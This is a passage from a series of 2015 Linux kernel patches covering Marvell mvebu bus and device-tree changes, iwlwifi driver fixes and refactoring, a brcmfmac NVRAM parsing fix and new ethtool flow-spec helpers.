other readable character */ - return (c > 0x20 && c < 0x7f); + return (c >= 0x20 && c < 0x7f); } static bool is_whitespace(char c) @@ -120,7 +126,7 @@ static enum nvram_parser_state brcmf_nvram_handle_key(struct nvram_parser *nvp) nvp->multi_dev_v1 = true; if (strncmp(&nvp->fwnv->data[nvp->entry], "pcie/", 5) == 0) nvp->multi_dev_v2 = true; - } else if (!is_nvram_char(c)) { + } else if (!is_nvram_char(c) || c == ' ') { brcmf_dbg(INFO, "warning: ln=%d:col=%d: '=' expected, skip invalid key entry\n", nvp->line, nvp->column); return COMMENT; From 2ff9ab4c7b6d17c82a01e3449173465cf742e897 Mon Sep 17 00:00:00 2001 From: Imre Kaloz Date: Wed, 20 May 2015 23:22:04 +0200 Subject: [PATCH 354/872] ARM: mvebu: armada-xp-linksys-mamba: Disable internal RTC The Mamba (like the OpenBlocks AX3) doesn't have a crystal connected to the internal RTC - let's prevent the kernel from probing it. Signed-off-by: Imre Kaloz Cc: # v4.0 + Signed-off-by: Gregory CLEMENT --- arch/arm/boot/dts/armada-xp-linksys-mamba.dts | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/arch/arm/boot/dts/armada-xp-linksys-mamba.dts b/arch/arm/boot/dts/armada-xp-linksys-mamba.dts index a2cf2154dcdb..fdd187c55aa5 100644 --- a/arch/arm/boot/dts/armada-xp-linksys-mamba.dts +++ b/arch/arm/boot/dts/armada-xp-linksys-mamba.dts @@ -95,6 +95,11 @@ internal-regs { + rtc@10300 { + /* No crystal connected to the internal RTC */ + status = "disabled"; + }; + /* J10: VCC, NC, RX, NC, TX, GND */ serial@12000 { status = "okay"; From 8c9e06e64768665503e778088a39ecff3a6f2e0c Mon Sep 17 00:00:00 2001 From: Nicolas Schichan Date: Thu, 28 May 2015 10:40:12 +0200 Subject: [PATCH 355/872] bus: mvebu-mbus: do not set WIN_CTRL_SYNCBARRIER on non io-coherent platforms. Commit a0b5cd4ac2d6 ("bus: mvebu-mbus: use automatic I/O synchronization barriers") enabled the usage of automatic I/O synchronization barriers by enabling bit WIN_CTRL_SYNCBARRIER in the control registers of MBus windows, but on non io-coherent platforms (orion5x, kirkwood and dove) the WIN_CTRL_SYNCBARRIER bit in the window control register is either reserved (all windows except 6 and 7) or enables read-only protection (windows 6 and 7). Signed-off-by: Nicolas Schichan Reviewed-by: Thomas Petazzoni Cc: # v4.0+ Fixes: a0b5cd4ac2d6 ("bus: mvebu-mbus: use automatic I/O synchronization barriers") Signed-off-by: Thomas Petazzoni Signed-off-by: Gregory CLEMENT --- drivers/bus/mvebu-mbus.c | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/drivers/bus/mvebu-mbus.c b/drivers/bus/mvebu-mbus.c index fb9ec6221730..7fa4510dfbe4 100644 --- a/drivers/bus/mvebu-mbus.c +++ b/drivers/bus/mvebu-mbus.c @@ -70,6 +70,7 @@ */ #define WIN_CTRL_OFF 0x0000 #define WIN_CTRL_ENABLE BIT(0) +/* Only on HW I/O coherency capable platforms */ #define WIN_CTRL_SYNCBARRIER BIT(1) #define WIN_CTRL_TGT_MASK 0xf0 #define WIN_CTRL_TGT_SHIFT 4 @@ -323,8 +324,9 @@ static int mvebu_mbus_setup_window(struct mvebu_mbus_state *mbus, ctrl = ((size - 1) & WIN_CTRL_SIZE_MASK) | (attr << WIN_CTRL_ATTR_SHIFT) | (target << WIN_CTRL_TGT_SHIFT) | - WIN_CTRL_SYNCBARRIER | WIN_CTRL_ENABLE; + if (mbus->hw_io_coherency) + ctrl |= WIN_CTRL_SYNCBARRIER; writel(base & WIN_BASE_LOW, addr + WIN_BASE_OFF); writel(ctrl, addr + WIN_CTRL_OFF); From 885dbd154b2f2ee305cec6fd0a162e1a77ae2b06 Mon Sep 17 00:00:00 2001 From: Thomas Petazzoni Date: Thu, 28 May 2015 10:40:13 +0200 Subject: [PATCH 356/872] Revert "bus: mvebu-mbus: make sure SDRAM CS for DMA don't overlap the MBus bridge window" This reverts commit 1737cac69369 ("bus: mvebu-mbus: make sure SDRAM CS for DMA don't overlap the MBus bridge window"), because it breaks DMA on platforms having more than 2 GB of RAM. This commit changed the information reported to DMA masters device drivers through the mv_mbus_dram_info() function so that the returned DRAM ranges do not overlap with I/O windows. This was necessary as a preparation to support the new CESA Crypto Engine driver, which will use DMA for cryptographic operations. But since it does DMA with the SRAM which is mapped as an I/O window, having DRAM ranges overlapping with I/O windows was problematic. To solve this, the above mentioned commit changed the mvebu-mbus to adjust the DRAM ranges so that they don't overlap with the I/O windows. However, by doing this, we re-adjust the DRAM ranges in a way that makes them have a size that is no longer a power of two. While this is perfectly fine for the Crypto Engine, which supports DRAM ranges with a granularity of 64 KB, it breaks basically all other DMA masters, which expect power of two sizes for the DRAM ranges. Due to this, if the installed system memory is 4 GB, in two chip-selects of 2 GB, the second DRAM range will be reduced from 2 GB to a little bit less than 2 GB to not overlap with the I/O windows, in a way that results in a DRAM range that doesn't have a power of two size. This means that whenever you do a DMA transfer with an address located in the [ 2 GB ; 4 GB ] area, it will freeze the system. Any serious DMA activity like simply running: for i in $(seq 1 64) ; do dd if=/dev/urandom of=file$i bs=1M count=16 ; done in an ext3 partition mounted over a SATA drive will freeze the system. Since the new CESA crypto driver that uses DMA has not been merged yet, the easiest fix is to simply revert this commit. A follow-up commit will introduce a different solution for the CESA crypto driver. Signed-off-by: Thomas Petazzoni Fixes: 1737cac69369 ("bus: mvebu-mbus: make sure SDRAM CS for DMA don't overlap the MBus bridge window") Cc: # v4.0+ Signed-off-by: Gregory CLEMENT --- drivers/bus/mvebu-mbus.c | 105 ++++++--------------------------------- 1 file changed, 16 insertions(+), 89 deletions(-) diff --git a/drivers/bus/mvebu-mbus.c b/drivers/bus/mvebu-mbus.c index 7fa4510dfbe4..6f047dcb94c2 100644 --- a/drivers/bus/mvebu-mbus.c +++ b/drivers/bus/mvebu-mbus.c @@ -58,7 +58,6 @@ #include #include #include -#include /* * DDR target is the same on all platforms. @@ -103,9 +102,7 @@ /* Relative to mbusbridge_base */ #define MBUS_BRIDGE_CTRL_OFF 0x0 -#define MBUS_BRIDGE_SIZE_MASK 0xffff0000 #define MBUS_BRIDGE_BASE_OFF 0x4 -#define MBUS_BRIDGE_BASE_MASK 0xffff0000 /* Maximum number of windows, for all known platforms */ #define MBUS_WINS_MAX 20 @@ -579,106 +576,36 @@ static unsigned int armada_xp_mbus_win_remap_offset(int win) return MVEBU_MBUS_NO_REMAP; } -/* - * Use the memblock information to find the MBus bridge hole in the - * physical address space. - */ -static void __init -mvebu_mbus_find_bridge_hole(uint64_t *start, uint64_t *end) -{ - struct memblock_region *r; - uint64_t s = 0; - - for_each_memblock(memory, r) { - /* - * This part of the memory is above 4 GB, so we don't - * care for the MBus bridge hole. - */ - if (r->base >= 0x100000000) - continue; - - /* - * The MBus bridge hole is at the end of the RAM under - * the 4 GB limit. - */ - if (r->base + r->size > s) - s = r->base + r->size; - } - - *start = s; - *end = 0x100000000; -} - static void __init mvebu_mbus_default_setup_cpu_target(struct mvebu_mbus_state *mbus) { int i; int cs; - uint64_t mbus_bridge_base, mbus_bridge_end; mvebu_mbus_dram_info.mbus_dram_target_id = TARGET_DDR; - mvebu_mbus_find_bridge_hole(&mbus_bridge_base, &mbus_bridge_end); - for (i = 0, cs = 0; i < 4; i++) { - u64 base = readl(mbus->sdramwins_base + DDR_BASE_CS_OFF(i)); - u64 size = readl(mbus->sdramwins_base + DDR_SIZE_CS_OFF(i)); - u64 end; - struct mbus_dram_window *w; - - /* Ignore entries that are not enabled */ - if (!(size & DDR_SIZE_ENABLED)) - continue; - - /* - * Ignore entries whose base address is above 2^32, - * since devices cannot DMA to such high addresses - */ - if (base & DDR_BASE_CS_HIGH_MASK) - continue; - - base = base & DDR_BASE_CS_LOW_MASK; - size = (size | ~DDR_SIZE_MASK) + 1; - end = base + size; - - /* - * Adjust base/size of the current CS to make sure it - * doesn't overlap with the MBus bridge hole. This is - * particularly important for devices that do DMA from - * DRAM to a SRAM mapped in a MBus window, such as the - * CESA cryptographic engine. - */ + u32 base = readl(mbus->sdramwins_base + DDR_BASE_CS_OFF(i)); + u32 size = readl(mbus->sdramwins_base + DDR_SIZE_CS_OFF(i)); /* - * The CS is fully enclosed inside the MBus bridge - * area, so ignore it. + * We only take care of entries for which the chip + * select is enabled, and that don't have high base + * address bits set (devices can only access the first + * 32 bits of the memory). */ - if (base >= mbus_bridge_base && end <= mbus_bridge_end) - continue; + if ((size & DDR_SIZE_ENABLED) && + !(base & DDR_BASE_CS_HIGH_MASK)) { + struct mbus_dram_window *w; - /* - * Beginning of CS overlaps with end of MBus, raise CS - * base address, and shrink its size. - */ - if (base >= mbus_bridge_base && end > mbus_bridge_end) { - size -= mbus_bridge_end - base; - base = mbus_bridge_end; + w = &mvebu_mbus_dram_info.cs[cs++]; + w->cs_index = i; + w->mbus_attr = 0xf & ~(1 << i); + if (mbus->hw_io_coherency) + w->mbus_attr |= ATTR_HW_COHERENCY; + w->base = base & DDR_BASE_CS_LOW_MASK; + w->size = (size | ~DDR_SIZE_MASK) + 1; } - - /* - * End of CS overlaps with beginning of MBus, shrink - * CS size. - */ - if (base < mbus_bridge_base && end > mbus_bridge_base) - size -= end - mbus_bridge_base; - - w = &mvebu_mbus_dram_info.cs[cs++]; - w->cs_index = i; - w->mbus_attr = 0xf & ~(1 << i); - if (mbus->hw_io_coherency) - w->mbus_attr |= ATTR_HW_COHERENCY; - w->base = base; - w->size = size; } mvebu_mbus_dram_info.num_cs = cs; } From fc8a350d0b8df744fd6d3c55907b3886979d2638 Mon Sep 17 00:00:00 2001 From: Ilan Peer Date: Wed, 13 May 2015 14:34:07 +0300 Subject: [PATCH 357/872] iwlwifi: pcie: fix tracking of cmd_in_flight The cmd_in_flight tracking was introduced to workaround faulty power management hardware, by having the driver keep the NIC awake as long as there are commands in flight. However, some of the code handling this workaround was unconditionally executed, which resulted with an inconsistent state where the driver assumed that the NIC was awake although it wasn't. Fix this by renaming 'cmd_in_flight' to 'cmd_hold_nic_awake' and handling the NIC requested awake state only for hardwares for which the workaround is needed. Signed-off-by: Ilan Peer Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/pcie/internal.h | 6 ++--- drivers/net/wireless/iwlwifi/pcie/trans.c | 4 ++-- drivers/net/wireless/iwlwifi/pcie/tx.c | 23 ++++++++------------ 3 files changed, 14 insertions(+), 19 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/pcie/internal.h b/drivers/net/wireless/iwlwifi/pcie/internal.h index 01996c9d98a7..376b84e54ad7 100644 --- a/drivers/net/wireless/iwlwifi/pcie/internal.h +++ b/drivers/net/wireless/iwlwifi/pcie/internal.h @@ -1,7 +1,7 @@ /****************************************************************************** * - * Copyright(c) 2003 - 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2013 - 2014 Intel Mobile Communications GmbH + * Copyright(c) 2003 - 2015 Intel Corporation. All rights reserved. + * Copyright(c) 2013 - 2015 Intel Mobile Communications GmbH * * Portions of this file are derived from the ipw3945 project, as well * as portions of the ieee80211 subsystem header files. @@ -320,7 +320,7 @@ struct iwl_trans_pcie { /*protect hw register */ spinlock_t reg_lock; - bool cmd_in_flight; + bool cmd_hold_nic_awake; bool ref_cmd_in_flight; /* protect ref counter */ diff --git a/drivers/net/wireless/iwlwifi/pcie/trans.c b/drivers/net/wireless/iwlwifi/pcie/trans.c index d6f6515fe663..dc179094e6a0 100644 --- a/drivers/net/wireless/iwlwifi/pcie/trans.c +++ b/drivers/net/wireless/iwlwifi/pcie/trans.c @@ -1372,7 +1372,7 @@ static bool iwl_trans_pcie_grab_nic_access(struct iwl_trans *trans, bool silent, spin_lock_irqsave(&trans_pcie->reg_lock, *flags); - if (trans_pcie->cmd_in_flight) + if (trans_pcie->cmd_hold_nic_awake) goto out; /* this bit wakes up the NIC */ @@ -1438,7 +1438,7 @@ static void iwl_trans_pcie_release_nic_access(struct iwl_trans *trans, */ __acquire(&trans_pcie->reg_lock); - if (trans_pcie->cmd_in_flight) + if (trans_pcie->cmd_hold_nic_awake) goto out; __iwl_trans_pcie_clear_bit(trans, CSR_GP_CNTRL, diff --git a/drivers/net/wireless/iwlwifi/pcie/tx.c b/drivers/net/wireless/iwlwifi/pcie/tx.c index 06952aadfd7b..5ef8044c2ea3 100644 --- a/drivers/net/wireless/iwlwifi/pcie/tx.c +++ b/drivers/net/wireless/iwlwifi/pcie/tx.c @@ -1039,18 +1039,14 @@ static int iwl_pcie_set_cmd_in_flight(struct iwl_trans *trans, iwl_trans_pcie_ref(trans); } - if (trans_pcie->cmd_in_flight) - return 0; - - trans_pcie->cmd_in_flight = true; - /* * wake up the NIC to make sure that the firmware will see the host * command - we will let the NIC sleep once all the host commands * returned. This needs to be done only on NICs that have * apmg_wake_up_wa set. */ - if (trans->cfg->base_params->apmg_wake_up_wa) { + if (trans->cfg->base_params->apmg_wake_up_wa && + !trans_pcie->cmd_hold_nic_awake) { __iwl_trans_pcie_set_bit(trans, CSR_GP_CNTRL, CSR_GP_CNTRL_REG_FLAG_MAC_ACCESS_REQ); if (trans->cfg->device_family == IWL_DEVICE_FAMILY_8000) @@ -1064,10 +1060,10 @@ static int iwl_pcie_set_cmd_in_flight(struct iwl_trans *trans, if (ret < 0) { __iwl_trans_pcie_clear_bit(trans, CSR_GP_CNTRL, CSR_GP_CNTRL_REG_FLAG_MAC_ACCESS_REQ); - trans_pcie->cmd_in_flight = false; IWL_ERR(trans, "Failed to wake NIC for hcmd\n"); return -EIO; } + trans_pcie->cmd_hold_nic_awake = true; } return 0; @@ -1085,15 +1081,14 @@ static int iwl_pcie_clear_cmd_in_flight(struct iwl_trans *trans) iwl_trans_pcie_unref(trans); } - if (WARN_ON(!trans_pcie->cmd_in_flight)) - return 0; - - trans_pcie->cmd_in_flight = false; + if (trans->cfg->base_params->apmg_wake_up_wa) { + if (WARN_ON(!trans_pcie->cmd_hold_nic_awake)) + return 0; - if (trans->cfg->base_params->apmg_wake_up_wa) + trans_pcie->cmd_hold_nic_awake = false; __iwl_trans_pcie_clear_bit(trans, CSR_GP_CNTRL, - CSR_GP_CNTRL_REG_FLAG_MAC_ACCESS_REQ); - + CSR_GP_CNTRL_REG_FLAG_MAC_ACCESS_REQ); + } return 0; } From f115fdfd61bd627e99d636bb61a3d3ff93397048 Mon Sep 17 00:00:00 2001 From: Liad Kaufman Date: Tue, 19 May 2015 14:20:25 +0300 Subject: [PATCH 358/872] iwlwifi: nvm: fix otp parsing in 8000 hw family The radio cfg DWORD was taken from the wrong place in the 8000 HW family, after a line in the code was wrongly changed by mistake. This broke several 8260 devices. Fixes: 5dd9c68a854a ("iwlwifi: drop support for early versions of 8000") Signed-off-by: Liad Kaufman Reviewed-by: Johannes Berg Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/iwl-nvm-parse.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/wireless/iwlwifi/iwl-nvm-parse.c b/drivers/net/wireless/iwlwifi/iwl-nvm-parse.c index 75e96db6626b..8e604a3931ca 100644 --- a/drivers/net/wireless/iwlwifi/iwl-nvm-parse.c +++ b/drivers/net/wireless/iwlwifi/iwl-nvm-parse.c @@ -471,7 +471,7 @@ static int iwl_get_radio_cfg(const struct iwl_cfg *cfg, const __le16 *nvm_sw, if (cfg->device_family != IWL_DEVICE_FAMILY_8000) return le16_to_cpup(nvm_sw + RADIO_CFG); - return le32_to_cpup((__le32 *)(nvm_sw + RADIO_CFG_FAMILY_8000)); + return le32_to_cpup((__le32 *)(phy_sku + RADIO_CFG_FAMILY_8000)); } From 8cf6f497de405ca9eb87ffb34d90699962d10125 Mon Sep 17 00:00:00 2001 From: John Fastabend Date: Tue, 26 May 2015 08:22:49 -0700 Subject: [PATCH 359/872] ethtool: Add helper routines to pass vf to rx_flow_spec The ring_cookie is 64 bits wide which is much larger than can be used for actual queue index values. So provide some helper routines to pack a VF index into the cookie. This is useful to steer packets to a VF ring without having to know the queue layout of the device. CC: Alex Duyck Signed-off-by: John Fastabend Signed-off-by: Jeff Kirsher --- include/uapi/linux/ethtool.h | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) diff --git a/include/uapi/linux/ethtool.h b/include/uapi/linux/ethtool.h index ae832b45b44c..0594933cdf55 100644 --- a/include/uapi/linux/ethtool.h +++ b/include/uapi/linux/ethtool.h @@ -796,6 +796,31 @@ struct ethtool_rx_flow_spec { __u32 location; }; +/* How rings are layed out when accessing virtual functions or + * offloaded queues is device specific. To allow users to do flow + * steering and specify these queues the ring cookie is partitioned + * into a 32bit queue index with an 8 bit virtual function id. + * This also leaves the 3bytes for further specifiers. It is possible + * future devices may support more than 256 virtual functions if + * devices start supporting PCIe w/ARI. However at the moment I + * do not know of any devices that support this so I do not reserve + * space for this at this time. If a future patch consumes the next + * byte it should be aware of this possiblity. + */ +#define ETHTOOL_RX_FLOW_SPEC_RING 0x00000000FFFFFFFFLL +#define ETHTOOL_RX_FLOW_SPEC_RING_VF 0x000000FF00000000LL +#define ETHTOOL_RX_FLOW_SPEC_RING_VF_OFF 32 +static inline __u64 ethtool_get_flow_spec_ring(__u64 ring_cookie) +{ + return ETHTOOL_RX_FLOW_SPEC_RING & ring_cookie; +}; + +static inline __u64 ethtool_get_flow_spec_ring_vf(__u64 ring_cookie) +{ + return (ETHTOOL_RX_FLOW_SPEC_RING_VF & ring_cookie) >> + ETHTOOL_RX_FLOW_SPEC_RING_VF_OFF; +}; + /** * struct ethtool_rxnfc - command to get or set RX flow classification rules * @cmd: Specific command number - %ETHTOOL_GRXFH, %ETHTOOL_SRXFH, From b8c474d9c51443ed67336ac89450de44dccee6c0 Mon Sep 17 00:00:00 2001 From: Nicholas Krause Date: Sat, 23 May 2015 20:53:21 -0400 Subject: [PATCH 360/872] iwlwifi: Remove use of the deprecacted PTR_RET This removes the use of the two deprecated calls to the macro PTR_RET in iwl_mvm_get_regdomain and replaces them both to PTR_ERR_OR_ZERO. Signed-off-by: Nicholas Krause [Commit message editing] Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/mac80211.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/mac80211.c b/drivers/net/wireless/iwlwifi/mvm/mac80211.c index ccbe5757dd26..677143c79fa6 100644 --- a/drivers/net/wireless/iwlwifi/mvm/mac80211.c +++ b/drivers/net/wireless/iwlwifi/mvm/mac80211.c @@ -318,7 +318,7 @@ struct ieee80211_regdomain *iwl_mvm_get_regdomain(struct wiphy *wiphy, resp = iwl_mvm_update_mcc(mvm, alpha2, src_id); if (IS_ERR_OR_NULL(resp)) { IWL_DEBUG_LAR(mvm, "Could not get update from FW %d\n", - PTR_RET(resp)); + PTR_ERR_OR_ZERO(resp)); goto out; } @@ -334,7 +334,7 @@ struct ieee80211_regdomain *iwl_mvm_get_regdomain(struct wiphy *wiphy, kfree(resp); if (IS_ERR_OR_NULL(regd)) { IWL_DEBUG_LAR(mvm, "Could not get parse update from FW %d\n", - PTR_RET(regd)); + PTR_ERR_OR_ZERO(regd)); goto out; } From a54cb6411b96379e107c364f2f0883c47628d046 Mon Sep 17 00:00:00 2001 From: Luciano Coelho Date: Mon, 25 May 2015 09:36:53 +0300 Subject: [PATCH 361/872] iwlwifi: mvm: small fix in a comment about UMAC scan schedules The UMAC API supports multiple scan schedules, but now we use only a single one. Change the comment to make this clear and avoid confusion. Signed-off-by: Luciano Coelho Reviewed-by: David Spinadel Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/scan.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/scan.c b/drivers/net/wireless/iwlwifi/mvm/scan.c index e50fd3fd8ab0..e54432aad2e5 100644 --- a/drivers/net/wireless/iwlwifi/mvm/scan.c +++ b/drivers/net/wireless/iwlwifi/mvm/scan.c @@ -1222,8 +1222,8 @@ static int iwl_mvm_scan_umac(struct iwl_mvm *mvm, struct ieee80211_vif *vif, iwl_mvm_umac_scan_cfg_channels(mvm, params->channels, params->n_channels, ssid_bitmap, cmd); - /* With UMAC we can have only one schedule, so use the sum of - * the iterations (with a a maximum of 255). + /* With UMAC we use only one schedule for now, so use the sum + * of the iterations (with a a maximum of 255). */ sec_part->schedule[0].iter_count = (n_iterations > 255) ? 255 : n_iterations; From 7b501d10b18bc34cc486201027fd6fc35779fb0e Mon Sep 17 00:00:00 2001 From: Johannes Berg Date: Fri, 22 May 2015 11:28:58 +0200 Subject: [PATCH 362/872] iwlwifi: refactor common transport alloc/init code The transport modules all need to allocate memory and set up certain values. Refactor that code into a new common function to share it and to simplify the error handling. Signed-off-by: Johannes Berg Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/Makefile | 1 + drivers/net/wireless/iwlwifi/iwl-trans.c | 113 ++++++++++++++++++++++ drivers/net/wireless/iwlwifi/iwl-trans.h | 20 ++-- drivers/net/wireless/iwlwifi/pcie/trans.c | 40 ++------ 4 files changed, 131 insertions(+), 43 deletions(-) create mode 100644 drivers/net/wireless/iwlwifi/iwl-trans.c diff --git a/drivers/net/wireless/iwlwifi/Makefile b/drivers/net/wireless/iwlwifi/Makefile index 3d32f4120174..dbfc5b18bcb7 100644 --- a/drivers/net/wireless/iwlwifi/Makefile +++ b/drivers/net/wireless/iwlwifi/Makefile @@ -9,6 +9,7 @@ iwlwifi-objs += iwl-phy-db.o iwl-nvm-parse.o iwlwifi-objs += pcie/drv.o pcie/rx.o pcie/tx.o pcie/trans.o iwlwifi-$(CONFIG_IWLDVM) += iwl-1000.o iwl-2000.o iwl-5000.o iwl-6000.o iwlwifi-$(CONFIG_IWLMVM) += iwl-7000.o iwl-8000.o +iwlwifi-objs += iwl-trans.o iwlwifi-objs += $(iwlwifi-m) diff --git a/drivers/net/wireless/iwlwifi/iwl-trans.c b/drivers/net/wireless/iwlwifi/iwl-trans.c new file mode 100644 index 000000000000..9f8bcefc04c5 --- /dev/null +++ b/drivers/net/wireless/iwlwifi/iwl-trans.c @@ -0,0 +1,113 @@ +/****************************************************************************** + * + * This file is provided under a dual BSD/GPLv2 license. When using or + * redistributing this file, you may do so under either license. + * + * GPL LICENSE SUMMARY + * + * Copyright(c) 2015 Intel Mobile Communications GmbH + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of version 2 of the GNU General Public License as + * published by the Free Software Foundation. + * + * This program is distributed in the hope that it will be useful, but + * WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, write to the Free Software + * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110, + * USA + * + * The full GNU General Public License is included in this distribution + * in the file called COPYING. + * + * Contact Information: + * Intel Linux Wireless + * Intel Corporation, 5200 N.E. Elam Young Parkway, Hillsboro, OR 97124-6497 + * + * BSD LICENSE + * + * Copyright(c) 2015 Intel Mobile Communications GmbH + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions + * are met: + * + * * Redistributions of source code must retain the above copyright + * notice, this list of conditions and the following disclaimer. + * * Redistributions in binary form must reproduce the above copyright + * notice, this list of conditions and the following disclaimer in + * the documentation and/or other materials provided with the + * distribution. + * * Neither the name Intel Corporation nor the names of its + * contributors may be used to endorse or promote products derived + * from this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS + * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT + * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR + * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT + * OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, + * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT + * LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, + * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY + * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT + * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + * + *****************************************************************************/ +#include +#include "iwl-trans.h" + +struct iwl_trans *iwl_trans_alloc(unsigned int priv_size, + struct device *dev, + const struct iwl_cfg *cfg, + const struct iwl_trans_ops *ops, + size_t dev_cmd_headroom) +{ + struct iwl_trans *trans; +#ifdef CONFIG_LOCKDEP + static struct lock_class_key __key; +#endif + + trans = kzalloc(sizeof(*trans) + priv_size, GFP_KERNEL); + if (!trans) + return NULL; + +#ifdef CONFIG_LOCKDEP + lockdep_init_map(&trans->sync_cmd_lockdep_map, "sync_cmd_lockdep_map", + &__key, 0); +#endif + + trans->dev = dev; + trans->cfg = cfg; + trans->ops = ops; + trans->dev_cmd_headroom = dev_cmd_headroom; + + snprintf(trans->dev_cmd_pool_name, sizeof(trans->dev_cmd_pool_name), + "iwl_cmd_pool:%s", dev_name(trans->dev)); + trans->dev_cmd_pool = + kmem_cache_create(trans->dev_cmd_pool_name, + sizeof(struct iwl_device_cmd) + + trans->dev_cmd_headroom, + sizeof(void *), + SLAB_HWCACHE_ALIGN, + NULL); + if (!trans->dev_cmd_pool) + goto free; + + return trans; + free: + kfree(trans); + return NULL; +} + +void iwl_trans_free(struct iwl_trans *trans) +{ + kmem_cache_destroy(trans->dev_cmd_pool); + kfree(trans); +} diff --git a/drivers/net/wireless/iwlwifi/iwl-trans.h b/drivers/net/wireless/iwlwifi/iwl-trans.h index 56254a837214..eb34b94faf03 100644 --- a/drivers/net/wireless/iwlwifi/iwl-trans.h +++ b/drivers/net/wireless/iwlwifi/iwl-trans.h @@ -1010,20 +1010,20 @@ static inline void iwl_trans_fw_error(struct iwl_trans *trans) iwl_op_mode_nic_error(trans->op_mode); } +/***************************************************** + * transport helper functions + *****************************************************/ +struct iwl_trans *iwl_trans_alloc(unsigned int priv_size, + struct device *dev, + const struct iwl_cfg *cfg, + const struct iwl_trans_ops *ops, + size_t dev_cmd_headroom); +void iwl_trans_free(struct iwl_trans *trans); + /***************************************************** * driver (transport) register/unregister functions ******************************************************/ int __must_check iwl_pci_register_driver(void); void iwl_pci_unregister_driver(void); -static inline void trans_lockdep_init(struct iwl_trans *trans) -{ -#ifdef CONFIG_LOCKDEP - static struct lock_class_key __key; - - lockdep_init_map(&trans->sync_cmd_lockdep_map, "sync_cmd_lockdep_map", - &__key, 0); -#endif -} - #endif /* __iwl_trans_h__ */ diff --git a/drivers/net/wireless/iwlwifi/pcie/trans.c b/drivers/net/wireless/iwlwifi/pcie/trans.c index d8943384107e..5c523a7d54f7 100644 --- a/drivers/net/wireless/iwlwifi/pcie/trans.c +++ b/drivers/net/wireless/iwlwifi/pcie/trans.c @@ -1366,14 +1366,13 @@ void iwl_trans_pcie_free(struct iwl_trans *trans) iounmap(trans_pcie->hw_base); pci_release_regions(trans_pcie->pci_dev); pci_disable_device(trans_pcie->pci_dev); - kmem_cache_destroy(trans->dev_cmd_pool); if (trans_pcie->napi.poll) netif_napi_del(&trans_pcie->napi); iwl_pcie_free_fw_monitor(trans); - kfree(trans); + iwl_trans_free(trans); } static void iwl_trans_pcie_set_pmi(struct iwl_trans *trans, bool state) @@ -2466,18 +2465,13 @@ struct iwl_trans *iwl_trans_pcie_alloc(struct pci_dev *pdev, u16 pci_cmd; int err; - trans = kzalloc(sizeof(struct iwl_trans) + - sizeof(struct iwl_trans_pcie), GFP_KERNEL); - if (!trans) { - err = -ENOMEM; - goto out; - } + trans = iwl_trans_alloc(sizeof(struct iwl_trans_pcie), + &pdev->dev, cfg, &trans_ops_pcie, 0); + if (!trans) + return ERR_PTR(-ENOMEM); trans_pcie = IWL_TRANS_GET_PCIE_TRANS(trans); - trans->ops = &trans_ops_pcie; - trans->cfg = cfg; - trans_lockdep_init(trans); trans_pcie->trans = trans; spin_lock_init(&trans_pcie->irq_lock); spin_lock_init(&trans_pcie->reg_lock); @@ -2601,25 +2595,8 @@ struct iwl_trans *iwl_trans_pcie_alloc(struct pci_dev *pdev, /* Initialize the wait queue for commands */ init_waitqueue_head(&trans_pcie->wait_command_queue); - snprintf(trans->dev_cmd_pool_name, sizeof(trans->dev_cmd_pool_name), - "iwl_cmd_pool:%s", dev_name(trans->dev)); - - trans->dev_cmd_headroom = 0; - trans->dev_cmd_pool = - kmem_cache_create(trans->dev_cmd_pool_name, - sizeof(struct iwl_device_cmd) - + trans->dev_cmd_headroom, - sizeof(void *), - SLAB_HWCACHE_ALIGN, - NULL); - - if (!trans->dev_cmd_pool) { - err = -ENOMEM; - goto out_pci_disable_msi; - } - if (iwl_pcie_alloc_ict(trans)) - goto out_free_cmd_pool; + goto out_pci_disable_msi; err = request_threaded_irq(pdev->irq, iwl_pcie_isr, iwl_pcie_irq_handler, @@ -2636,8 +2613,6 @@ struct iwl_trans *iwl_trans_pcie_alloc(struct pci_dev *pdev, out_free_ict: iwl_pcie_free_ict(trans); -out_free_cmd_pool: - kmem_cache_destroy(trans->dev_cmd_pool); out_pci_disable_msi: pci_disable_msi(pdev); out_pci_release_regions: @@ -2645,7 +2620,6 @@ struct iwl_trans *iwl_trans_pcie_alloc(struct pci_dev *pdev, out_pci_disable_device: 